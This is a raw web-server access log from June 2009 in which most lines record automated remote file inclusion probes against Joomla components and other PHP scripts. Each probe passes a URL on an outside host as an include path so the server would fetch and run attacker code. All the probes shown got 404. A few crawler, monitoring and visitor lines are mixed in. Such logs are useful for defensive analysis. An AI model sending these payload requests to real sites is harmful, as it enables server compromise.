110.45.146.146 - - [16/Jun/2009:02:37:38 -0400] "GET /logs/access_log.Q109052300/mainbody.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
110.45.146.146 - - [16/Jun/2009:02:37:38 -0400] "GET /index2.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
110.45.146.146 - - [16/Jun/2009:02:37:38 -0400] "GET /mainbody.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
110.45.146.146 - - [16/Jun/2009:02:37:39 -0400] "GET /logs/access_log.Q109052300/index.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
110.45.146.146 - - [16/Jun/2009:02:37:39 -0400] "GET /logs/mainbody.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
110.45.146.146 - - [16/Jun/2009:02:37:39 -0400] "GET /logs/index2.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
110.45.146.146 - - [16/Jun/2009:02:37:39 -0400] "GET /index.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
110.45.146.146 - - [16/Jun/2009:02:37:40 -0400] "GET /logs/index.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
38.99.13.118 - - [16/Jun/2009:02:37:48 -0400] "GET /logs/error_log.Q107110200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
110.45.146.146 - - [16/Jun/2009:02:37:51 -0400] "GET /logs/access_log.Q109060900/mainbody.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
110.45.146.146 - - [16/Jun/2009:02:37:51 -0400] "GET /logs/access_log.Q109060900/index2.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
110.45.146.146 - - [16/Jun/2009:02:37:55 -0400] "GET /logs/access_log.Q109060900/index.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
69.94.125.100 - - [16/Jun/2009:02:38:36 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.94.125.100 - - [16/Jun/2009:02:38:36 -0400] "GET /logs/access_log.Q109051600//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
69.94.125.100 - - [16/Jun/2009:02:38:36 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:02:39:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.94.125.100 - - [16/Jun/2009:02:39:23 -0400] "GET /logs/access_log.Q109052800//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
69.94.125.100 - - [16/Jun/2009:02:39:56 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
69.94.125.100 - - [16/Jun/2009:02:40:09 -0400] "GET /logs/access_log.Q109052800%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:40:37 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:40:38 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:40:38 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.49.99.7 - - [16/Jun/2009:02:40:45 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yak.com.pl/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.49.99.7 - - [16/Jun/2009:02:40:45 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yak.com.pl/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.49.99.7 - - [16/Jun/2009:02:40:45 -0400] "GET /logs/access_log.Q109060400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yak.com.pl/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.49.99.7 - - [16/Jun/2009:02:40:57 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yak.com.pl/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.49.99.7 - - [16/Jun/2009:02:40:57 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yak.com.pl/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.49.99.7 - - [16/Jun/2009:02:40:57 -0400] "GET /logs/access_log.Q109060400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yak.com.pl/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.48.190.67 - - [16/Jun/2009:02:41:38 -0400] "GET /logs/error_log.Q109051400/index2.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.48.190.67 - - [16/Jun/2009:02:41:39 -0400] "GET /index2.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.48.190.67 - - [16/Jun/2009:02:41:39 -0400] "GET /logs/error_log.Q109051400/mainbody.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
211.48.190.67 - - [16/Jun/2009:02:41:39 -0400] "GET /logs/error_log.Q109051400/index.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
81.176.230.136 - - [16/Jun/2009:02:41:39 -0400] "GET /logs/error_log.Q109051700//[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://book-ua.org//upload/id1.txt? HTTP/1.1" 404 307 "-" "Mozilla/5.0"
211.48.190.67 - - [16/Jun/2009:02:41:40 -0400] "GET /logs/index2.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
211.48.190.67 - - [16/Jun/2009:02:41:40 -0400] "GET /mainbody.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
211.48.190.67 - - [16/Jun/2009:02:41:40 -0400] "GET /index.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
211.48.190.67 - - [16/Jun/2009:02:41:41 -0400] "GET /logs/mainbody.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
211.48.190.67 - - [16/Jun/2009:02:41:41 -0400] "GET /logs/index.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
211.48.190.67 - - [16/Jun/2009:02:43:57 -0400] "GET /logs/access_log.Q109052300/mainbody.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
211.48.190.67 - - [16/Jun/2009:02:43:58 -0400] "GET /logs/access_log.Q109052300/index2.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
211.48.190.67 - - [16/Jun/2009:02:44:06 -0400] "GET /logs/access_log.Q109052300/index.php?option=com_custompages&cpage=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
209.59.12.99 - - [16/Jun/2009:02:44:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [16/Jun/2009:02:44:17 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:44:17 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:44:18 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.151.2.98 - - [16/Jun/2009:02:44:25 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:44:25 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:44:25 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:44:25 -0400] "GET /logs/access_log.Q109051700/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:44:26 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:44:26 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:44:26 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:44:27 -0400] "GET /logs/access_log.Q109051700/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
195.34.78.110 - - [16/Jun/2009:02:44:38 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:44:39 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:44:41 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:44:41 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:44:51 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:45:58 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:45:58 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:45:59 -0400] "GET /logs/access_log.Q109052500//components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:46:03 -0400] "GET /logs/access_log.Q109052500//components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.151.2.98 - - [16/Jun/2009:02:46:19 -0400] "GET /logs/access_log.Q109060400%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
195.34.78.110 - - [16/Jun/2009:02:46:27 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:46:28 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:46:29 -0400] "GET /logs/access_log.Q109052500//components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:46:33 -0400] "GET /logs/access_log.Q109052500//components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.165.73.157 - - [16/Jun/2009:02:46:35 -0400] "GET /logs/access_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.165.73.157 - - [16/Jun/2009:02:46:35 -0400] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [16/Jun/2009:02:46:35 -0400] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.198.32.3 - - [16/Jun/2009:02:46:47 -0400] "GET /logs/access_log.Q109052900/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/info.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
91.198.32.3 - - [16/Jun/2009:02:46:47 -0400] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/info.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
91.198.32.3 - - [16/Jun/2009:02:46:48 -0400] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.aptd.ru/files/info.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
195.34.78.110 - - [16/Jun/2009:02:46:55 -0400] "GET /logs/access_log.Q109052500//components/com_simpleboard/image_upload.php?sbp=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.151.2.98 - - [16/Jun/2009:02:46:59 -0400] "GET /logs/access_log.Q109060400%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
124.217.216.86 - - [16/Jun/2009:02:47:14 -0400] "GET /logs/access_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://www.fzv.uni-mb.si/page/components/perkosa.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.826"
124.217.216.86 - - [16/Jun/2009:02:47:14 -0400] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.fzv.uni-mb.si/page/components/perkosa.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
124.217.216.86 - - [16/Jun/2009:02:47:14 -0400] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.fzv.uni-mb.si/page/components/perkosa.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
124.217.216.86 - - [16/Jun/2009:02:47:14 -0400] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.fzv.uni-mb.si/page/components/perkosa.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.826"
124.217.216.86 - - [16/Jun/2009:02:47:14 -0400] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.fzv.uni-mb.si/page/components/perkosa.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.826"
124.217.216.86 - - [16/Jun/2009:02:47:14 -0400] "GET /logs/access_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://www.fzv.uni-mb.si/page/components/perkosa.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.826"
74.6.17.151 - - [16/Jun/2009:02:47:46 -0400] "GET /logs/error_log.Q109051500 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
38.99.44.103 - - [16/Jun/2009:02:47:52 -0400] "GET /logs/error_log.Q108051700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.151.2.98 - - [16/Jun/2009:02:48:00 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:48:00 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:48:00 -0400] "GET /logs/access_log.Q109051000//index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:48:01 -0400] "GET /logs/access_log.Q109051000//index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:48:01 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:48:02 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
66.249.71.54 - - [16/Jun/2009:02:48:17 -0400] "GET /images/index5_surgscis.jpg HTTP/1.1" 200 3404 "-" "Googlebot-Image/1.0"
216.151.2.98 - - [16/Jun/2009:02:48:21 -0400] "GET /logs/access_log.Q109052600//index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:48:24 -0400] "GET /logs/access_log.Q109052600//index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:48:58 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:48:58 -0400] "GET /logs/access_log.Q109051000//index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:48:59 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
218.249.36.194 - - [16/Jun/2009:02:49:08 -0400] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:02:49:08 -0400] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:02:49:08 -0400] "GET /logs/access_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:02:49:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.151.2.98 - - [16/Jun/2009:02:49:21 -0400] "GET /logs/access_log.Q109052600//index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
124.217.216.86 - - [16/Jun/2009:02:49:39 -0400] "GET /logs/error_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://www.fzv.uni-mb.si/page/components/perkosa.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.826"
124.217.216.86 - - [16/Jun/2009:02:49:44 -0400] "GET /logs/error_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://www.fzv.uni-mb.si/page/components/perkosa.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.826"
216.151.2.98 - - [16/Jun/2009:02:49:45 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:49:45 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:49:45 -0400] "GET /logs/access_log.Q109051000//index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:50:08 -0400] "GET /logs/access_log.Q109052600//index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
211.203.180.144 - - [16/Jun/2009:02:50:49 -0400] "GET /logs/access_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
211.203.180.144 - - [16/Jun/2009:02:50:49 -0400] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
211.203.180.144 - - [16/Jun/2009:02:50:49 -0400] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
211.203.180.144 - - [16/Jun/2009:02:50:58 -0400] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
211.203.180.144 - - [16/Jun/2009:02:50:58 -0400] "GET /logs/access_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
211.203.180.144 - - [16/Jun/2009:02:50:58 -0400] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
38.99.44.103 - - [16/Jun/2009:02:51:10 -0400] "GET /logs/error_log.Q107120900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
200.105.207.244 - - [16/Jun/2009:02:52:15 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:02:52:15 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:02:52:20 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:02:52:27 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
79.178.11.4 - - [16/Jun/2009:02:52:35 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:52:35 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:52:37 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:52:37 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
89.223.3.98 - - [16/Jun/2009:02:53:02 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [16/Jun/2009:02:53:02 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.203.180.144 - - [16/Jun/2009:02:53:06 -0400] "GET /logs/error_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
